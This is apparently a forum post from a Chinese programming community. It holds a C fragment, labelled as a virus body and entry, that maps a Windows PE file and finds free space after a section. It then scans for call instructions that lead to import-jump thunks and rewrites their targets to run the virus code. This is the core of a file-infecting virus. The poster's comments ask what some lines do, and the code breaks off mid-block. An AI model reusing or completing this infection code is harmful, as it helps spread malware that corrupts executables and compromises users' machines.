21,459
社区成员
发帖
与我相关
我的任务
分享
//病毒体
thunkcode
//病毒入口
pGapEntry = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping+
pImageSectionHeader->Misc.VirtualSize) ;
vir_len = (int)pImageSectionHeader->Misc.VirtualSize ;
pSearch = (unsigned char *)(pImageSectionHeader->PointerToRawData+
(DWORD)pMapping) ;
//:::搜索call指令(0xe8)
for (i=0;i<vir_len;i++)
{
if (pSearch[i]==0xe8)
{
dwCallDataAddr = (DWORD *)(&pSearch[i]+1) ;
dwCallNextAddr=(DWORD *)(&pSearch[i]+5) ;
dwJmpAddr = (DWORD *)(*dwCallDataAddr+ (DWORD)dwCallNextAddr) ;
dwJmpVA = (DWORD)dwJmpAddr-
((DWORD)pMapping+pImageSectionHeader->PointerToRawData)+
pImageNtHeaders->OptionalHeader.ImageBase+
pImageNtHeaders->OptionalHeader.AddressOfEntryPoint ;
dwJmpData = *((DWORD *)((unsigned char *)dwJmpAddr+2)) ;//这句似乎有错误,这句看不懂
//dwJmpData存放的为原来的地址,也就是病毒体运行后要jmp的地址
//dwJmpData这个值应该怎么求?
if ((*dwJmpAddr&0xffff)==0x25ff)//这句是什么意思
{
dwCodeDistance = (DWORD)pGapEntry - (DWORD)dwCallNextAddr ;
*dwCallDataAddr = dwCodeDistance ;